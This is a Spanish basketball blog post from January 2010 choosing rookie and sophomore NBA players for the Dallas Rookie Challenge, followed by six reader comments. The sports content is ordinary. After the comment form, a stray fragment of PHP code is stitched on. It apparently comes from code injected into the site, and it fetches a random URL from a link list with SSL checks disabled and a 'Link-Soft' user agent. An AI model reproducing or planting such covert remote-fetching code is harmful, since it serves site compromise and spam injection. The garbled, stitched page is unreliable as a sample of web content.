Dallas 2010: Rookies vs Sophomores

27 de January de 2010 por Viva_Dirk

Igual que Txusma hizo su elección de los mayores yo os voy a dejar mi elección de los mas jóvenes.

QUINTETO ROOKIE

Brandon Jennings: El base de los Bucks empezó la temporada de una forma espectacular, con actuaciones de 40 puntos y unas sensaciones brutales. Aunque no ha mantenido ese ritmo inicial, sus números actuales son de 18 puntos, 3.6 rebotes y 6.2 asistencias, nada mal para un chico que despertaba muchas dudas tras su fantasmagórico paso por Europa. Su punto negro lo vemos sin duda en un pésimo 38.6% en tiros, algo que suele ocurrir con rookies que en su primer año se ven obligados a tirar mucho a canasta.

Tyreke Evans: Sólo Jennings puede disputarle a Evans el ROY y debería ser acercándose a su nivel inicial. Los 20.8 puntos, 5 rebotes y 5 asistencias de Evans son unos números espectaculares, casi para estar en el All-Star de los mayores. En lo que va de temporada el de los Kings ha dejado entrever un escolta capaz de llegar hasta el aro a cualquier precio y, a pesar de tener carta blanca, no le hemos visto jugar para su lucimiento personal sino para el rendimiento colectivo. La única duda es saber que pasará en Sacramento hasta que se cierre el mercado.

Omri Casspi: El jugador israelí se ha hecho con un hueco en los Kings a base de trabajo, juego de equipo y unas cotas de calidad. Sus números de 12.6 puntos y 5 rebotes con un 47% en tiros de campo y un 41% en triples son los de un buen complemento para una estrella como Evans.

Taj Gibson: El juego interior queda huerfano con la baja de Blake Griffin pero la temporada de Taj Gibson no es nada despreciable. Ha conseguido que la suplencia de Tyrus Thomas sea algo natural gracias a un juego serio y que poco tiene que ver con las estadísticas, que son de 8.5 puntos y 6.2 rebotes en 24 minutos de juego. Jugador de equipo y currante como el que más.

DeJuan Blair: Bien podríamos dejar desierto este puesto pero el rendimiento por minuto y alguna de las últimas actuaciones de Blair le hacen merecedor de estar aquí. Sus años de universidad dejaban claro que era una bestia bajo los aros, buen intimidador y muy capaz de anotar, y eso es lo que ha hecho en los Spurs. En 17 minutos de juego su números son de 7.2 puntos y 6.3 rebotes con porcentajes del 56%. Hasta el momento nada podemos decir de lesiones y es que tampoco ha jugado demasiados minutos. El único punto negro es ese 52% en tiros libres.

BANQUILLO ROOKIE

Jonny Flynn: Su temporada está siendo aceptable sin más. En 30 minutos de juego sus números son de 14 puntos y 4 asistencias. Parece un jugador más indicado para ser titular/jugador importante en una plantilla fuerte que para ser estrella en un equipo de lotería.

Stephen Curry: Ha llegado a la liga como un gran anotador y está demostrando porqué. En la locura de los Warriors, Curry se mueve en unos buenos números como son sus 13 puntos, 4 rebotes y 4.5 asistencias, con un brutal 44% en tiros de 3.

James Harden: El escolta Nº3 del draft está yendo de menos a más, y es que en 23 minutos de juego anota 10 puntos con bajos porcentajes, pero es que en sus 10 primeros partidos no llegaba ni a los 6 puntos por encuentro. Se complementa perfectamente con Westbrook y Durant.

Ty Lawson: Fue estrella en NC y está aprendiendo al lado de uno de los mejores. Como suplente de Billups ha tenido actuaciones espectaculares y sus promedios en 22 minutos son de 9.4 puntos y 3.7 asistencias con un 50% en tiros de campo. Un autentico jugón.

Marcus Thornton: Se ha ganado minutos en NOH a base de regularidad en sus actuaciones y buen rendimiento cuando las bajas machacaban al equipo. En 18 minutos alcanza los 9.4 puntos de media y viendo como están las alas en los Hornets debería jugar cada vez más.

QUINTETO SOPHOMORE

Derrick Rose: Al igual que los Bulls, está teniendo una temporada un tanto irregular pero en este 2010 ha mejorado y con él la franquicia de la ciudad del viento. En los 13 partidos de este año sus números son de 23.3 puntos, 4.5 rebotes y 6.4 asistencias con un 51% en tiros de campo. Con él en este estado de forma los Bulls solo pueden ir hacia arriba.

Russell Westbrook: Totalmente consolidado como base titular estamos viendo a un Westbrook con unos números casi calcados a los de su año rookie, salvo por las 7.3 asistencias que superan las que daba el año pasado. Ha anotado alguna canasta importante y sigue siendo una garantía en defensa.

OJ Mayo: Hacemos una pequeña trampa poniendo a Mayo de SF, pero ni él ni Westbrook pueden quedarse fuera. Pieza clave de estos Grizzlies, también tiene números casi identicos a los del año pasado y sigue derrochando clase a cada paso que da.

Kevin Love: Las lesiones no nos estan dejando disfrutar de este jugón al 100% pero este año se está saliendo cuando está jugando: En 30 minutos suma 14.8 puntos, 11.9 rebotes y 2.6 asistencias. Tal es su impacto en el juego de los Wolves que los rumores de traspaso de Al Jefferson parecen surgir porque no se compenetra bien con Love en la pista.

Brook Lopez: En el despropósito que son los Nets una de las pocas cosas que podemos salvar es el año de Lopez. Por números y calidad debería estar en el All-Star de los mayores pero la vergonzosa marca de su equipo lo pone casi imposible. Los 19 puntos, 9.6 rebotes y 2 tapones peor secundados de la historia.

SUPLENTES SOPHOMORES

Michael Beasley: El año pasado fue decepcionante y el verano tan movido que tuvo no hacía presagiar nada bueno.  Afortunadamente, sin llegar a ver a la bestia que vino de Kansas, al menos le hemos encontrado algo más centrado y aportando de forma regular. Se espera más de él pero la mejora es evidente con esos 16.2 puntos y 6.8 rebotes.

Danilo Gallinari: Después de un primer año lastrado por la lesiones, las sensaciones de este año son buenas aunque no podemos juzgarlo del todo jugando a lo que juegan los Knicks. Es el 2º jugador de toda la liga que más triples tira y la exigencia defensiva que tiene es mínima. Sus números de 15 puntos y 5 rebotes cumplen con las expectativas.

Jason Thompson: Tras un primer año sorprendiendo a propios y extraños, Thompson se confirma como una gran baza para el juego interior de los Kings. Sus 13.7 puntos y 8.8 rebotes por noche no son más por sus problemas de faltas que debe ir puliendo.

Marc Gasol: Poco se puede decir que no sepamos de la temporada de Marc, sus números de 15 puntos, 9.6 rebotes, 1.6 tapones con un tremendo 60% en tiros de campo le sitúan en la élite de la liga.

Roy Hibbert: Empezó el año con grandes actuaciones y se ha desinflado con el paso de los partidos lo que le ha costado la titularidad en muchas ocasiones. En 23 minutos de juego sus números son de 11 puntos, 5.8 rebotes y 1.8 tapones. Gran parte de sus defectos son achacables a la falta de experiencia, así que esperamos verlos solucionados pronto.

Comenta

6 comentarios a esta entrada

  1. sergio dice:
    #1

    Un equipo mucho mas completo y currante el de los Sophomores. El teorico vapuleo en posiciones interiores deberia inclinar la balanza a su favor. Aunque no creo que sea este el año en que se rompa la racha de victorias de Sophomores hay que decir que el equipo de rookies depende mucho de sus rachas. Si se enchufa Jennings, Evans, Lawson o Blair la cosa cambia.

    Nada que objetar en la seleccion salvo que dudo que no saquen un alero puro en los Sophomores. Tampoco es que se apunte en el curriculum ser titular en este partido, siendo como es una bacanal defensivamente hablando.

      Citar

  2. sergio dice:
    #2

    Pues no…. Ty Lawson no ira finalmente a los Rookies. Su lugar lo ocupa Jerebko

      Citar

  3. Txusma dice:
    #3

    Bueno, Viva daba 10 nombres por equipos y al final parece ser que solo van 9. En los Rookies se caen Lawson y Thorton y jugara Jebreko que es la gran sorpresa del draft y en los Sophomores saltan Thompson y Hibbert y jugara Gordon. No me parecen malas decisiones. Q pena no poder polemizar…
    A ver mañana con el grande de los Gasol. Me da mala espina.

      Citar

  4. Toni dice:
    #4

    Txus estoy contigo, creo que el rebote contra los Cavs (partido en global)pesará en exceso, ojalá y me equivoque.
    Y que decís de lo de Oden?
    De bueno peca…

      Citar

  5. sergio dice:
    #5

    Para mi, desde hoy, Tim Duncan es: el abuson de Texas….

      Citar

  6. Viva_Dirk dice:
    #6

    No tiene nada que ver una generación con otra, los sophomores tienen a varios tios que llegaron a la NBA con varios años de universidad(Lopez, Westbrook, Hibbert, Thompson) o con una gran trayectoria como Marc, gente preparada. Y los que saltaron pronto lo hicieron porque eran buenísimos como Rose, Mayo, Love, Gordon o Beasley.

    La de este año hasta que Griffin diga lo contrario esta huerfana de grandes interiores, salvo Blair. Flynn, Harden, DeRozan y algunos que no aparecen en la lista deberian haberse quedado otro año en la universidad para ser mejores jugadores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>